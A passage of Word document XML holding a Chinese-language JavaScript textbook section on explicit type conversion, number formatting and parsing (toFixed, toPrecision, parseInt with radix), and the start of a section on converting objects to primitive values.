        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以自动做许多类型转换，但有时仍需要做显式转换，或者为了使代码变得清晰易读而做显式转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>做显式类型转换最简单的方法就是使用</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>函数。我们在</w:t>
      </w:r>
      <w:r>
        <w:t>3.6</w:t>
      </w:r>
      <w:r>
        <w:t>节已经介绍过了。当不通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>运算符调用这些函数时，它们会作为类型转换函数并按照表</w:t>
      </w:r>
      <w:r>
        <w:t>3-2</w:t>
      </w:r>
      <w:r>
        <w:t>所描述的规则做类型转换：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Number("3")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>String(false)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"fal</w:t>
      </w:r>
      <w:r>
        <w:t>se"</w:t>
      </w:r>
      <w:r>
        <w:t>或使用</w:t>
      </w:r>
      <w:r>
        <w:t>false.toString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Boolean([])//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object(3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>new Number(3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要注意的是，除了</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>之外的任何值都具有</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法的执行结果通常和</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回结果一致。同样需要注意的是，如果试图把</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>转换为对象则会像表</w:t>
      </w:r>
      <w:r>
        <w:t>3-2</w:t>
      </w:r>
      <w:r>
        <w:t>所描述的那样抛出一个类型错误（</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>Object()</w:t>
      </w:r>
      <w:r>
        <w:t>函数在这种情况下不会抛出异常：它仅简单地返回一个新创建的空对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Jav</w:t>
      </w:r>
      <w:r>
        <w:t>aScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的某些运算符会做隐式的类型转换，有时用于类型转换。如果</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的一个操作数是字符串，它将会把另外一个操作数转换为字符串。一元</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符将其操作数转换为数字。同样，一元</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符将其操作数转换为布尔值并取反。在代码中会经常见到这种类型转换的惯用法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x+""//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t>String(x)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>+x//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t>Number(x).</w:t>
      </w:r>
      <w:r>
        <w:t>也可以写成</w:t>
      </w:r>
      <w:r>
        <w:t>x-0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>!!x//</w:t>
      </w:r>
      <w:r>
        <w:t>等价于</w:t>
      </w:r>
      <w:r>
        <w:t>Boolean(x).</w:t>
      </w:r>
      <w:r>
        <w:t>注意是双叹号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在计算机程序中数字的解析和格式化是非常普通的工作，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中提供了专门的函数和方法</w:t>
      </w:r>
      <w:r>
        <w:t>用来做更加精确的数字到字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>number-to-string</w:t>
      </w:r>
      <w:r>
        <w:t>）和字符串到数字（</w:t>
      </w:r>
      <w:r>
        <w:t>string-to-number</w:t>
      </w:r>
      <w:r>
        <w:t>）的转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>类定义的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以接收表示转换基数（</w:t>
      </w:r>
      <w:r>
        <w:t>radix</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>的可选参数，如果不指定此参数，转换规则将是基于十进制。同样，亦可以将数字转换为其他进制数（范围在</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:t>之间），例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=17;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>binary_string=n.toString(2);//</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>"10001"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>octal_string="0"+n.toString(8);//</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>"021"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>hex_string="0x"+n.toString(16);//</w:t>
      </w:r>
      <w:r>
        <w:t>转换为</w:t>
      </w:r>
      <w:r>
        <w:t>"0x11"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当处理财务或科学数据的时候，在做数字到字符串的转换过程中，你期望自己控制输出中小数点位置和有效数字位数，或者决定是否需要指数记数法。</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>类为这种数字到字符串的类型转换场景定义了三个方法。</w:t>
      </w:r>
      <w:r>
        <w:t>toFixed()</w:t>
      </w:r>
      <w:r>
        <w:t>根据小数点后的指定位数将数字转换为字符串，它从不使用指数记数法。</w:t>
      </w:r>
      <w:r>
        <w:t>toExponential()</w:t>
      </w:r>
      <w:r>
        <w:t>使用指数记数法将数字转换为指数形式的字符串，其中小数点前只有一位，小数点后的位数则由参数指定（也就是说有效数字位数比指定的位数要多一位）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>toPrecision()</w:t>
      </w:r>
      <w:r>
        <w:t>根据指定的有效数字位数将数字转换成字</w:t>
      </w:r>
      <w:r>
        <w:t>符串。如果有效数字的位数少于数字整数部分的位数，则转换成指数形式。我们注意到，所有三个方法都会适当地进行四舍五入或填充</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。看一下下面几个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var n=123456.789;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toFixed(0);//"123457"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toFixed(2);//"123456.79"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toFixed(5);//"123456.78900"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toExponential(1);//"1.2e+5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toExponential(3);//"1.235e+5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(4);//"1.</w:t>
      </w:r>
      <w:r>
        <w:t>235e+5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(7);//"123456.8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n.toPrecision(10);//"123456.7890"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果通过</w:t>
      </w:r>
      <w:r>
        <w:t>Number()</w:t>
      </w:r>
      <w:r>
        <w:t>转换函数传入一个字符串，它会试图将其转换为一个整数或浮点数直接量，这个方法只能基于十进制数进行转换，并且不能出现非法的尾随字符。</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（它们是全局函数，不从属于任何类的方法）更加灵活。</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>只解析整数，而</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>则可以解析整数和浮点数。如果字符串前缀是</w:t>
      </w:r>
      <w:r>
        <w:t>"0x"</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>"0X"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>将其解释为十六进制数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>parseFloat()</w:t>
      </w:r>
      <w:r>
        <w:t>都会跳过任意数量的前导空格，尽可能解析更多数值字符，并忽略后面的内容。如果第一个非空格字符是非法的数字直接量，将最终返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("3 blind mice")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseFloat("3.14 meters")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("-12.34")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("0xFF")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("0xff")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("-0XFF")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>-255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseFloat(".1")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>parseInt("0.1")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt(".1")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>NaN:</w:t>
      </w:r>
      <w:r>
        <w:t>整数不能以</w:t>
      </w:r>
      <w:r>
        <w:t>"."</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseFloat("$72.47");//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>NaN:</w:t>
      </w:r>
      <w:r>
        <w:t>数字不能以</w:t>
      </w:r>
      <w:r>
        <w:t>"$"</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>可以接收第二个可选参数，这个参数指定数字转换的基数，合法的取值范围是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:t>，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("11",2);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3(1*2+1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("ff",16);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>255(1</w:t>
      </w:r>
      <w:r>
        <w:t>5*16+15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("zz",36);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1295(35*36+35)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("077",8);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>63(7*8+7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>parseInt("077",10);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>77(7*10+7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="3_8_3_Dui_Xiang_Zhuan_Huan_Wei_Yuan_Shi_"/>
      <w:r>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　对象转换为原始值</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象到布尔值的转换非常简单：所有的对象（包括数组和函数）都转换为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。对于包装对象亦是如此：</w:t>
      </w:r>
      <w:r>
        <w:t>new Boolean(false)</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象而不是原始值，它将转换为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象到字符串（</w:t>
      </w:r>
      <w:r>
        <w:t>object-to-string</w:t>
      </w:r>
      <w:r>
        <w:t>）和对象到数字（</w:t>
      </w:r>
      <w:r>
        <w:t>object-to-number</w:t>
      </w:r>
      <w:r>
        <w:t>）的转换是通过调用待转换对象的一个方法来完成的。一个麻烦的事实是，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象有两个不同的方法来执行转换，并且接下来要讨论的一些特殊场景更加复杂。值得注意的是，这里提到的字符串和数字的转换规则只适用于本地对象（</w:t>
      </w:r>
      <w:r>
        <w:t>native objec</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>）。宿主对象（例如，由</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器定义的对象）根据各自的算法可以转换成字符串和数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有的对象继承了两个转换方法。第一个是</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>，它的作用是返回一个反映这</w:t>
      </w:r>
      <w:r>
        <w:t>个对象的字符串。默认的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法并不会返回一个有趣的值（在例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>中我们会发现它非常有用）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>({x:1,y:2}).toString()//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"[object Object]"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多类定义了更多特定版本的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。例如，数组类（</w:t>
      </w:r>
      <w:r>
        <w:t>Array class</w:t>
      </w:r>
      <w:r>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将每个数组元素转换为一个字符串，并在元素之间添加逗号后合并成结果字符串。函数类（</w:t>
      </w:r>
      <w:r>
        <w:t>Function class</w:t>
      </w:r>
      <w:r>
        <w:t>）的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回这个函数的实现定义的表示方式。实际上，这里的实现方式是通</w:t>
      </w:r>
      <w:r>
        <w:t>常是将用户定义的函数转换为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>源代码字符串。日期类（</w:t>
      </w:r>
      <w:r>
        <w:t>Date class</w:t>
      </w:r>
      <w:r>
        <w:t>）定义的</w:t>
      </w:r>
      <w:r>
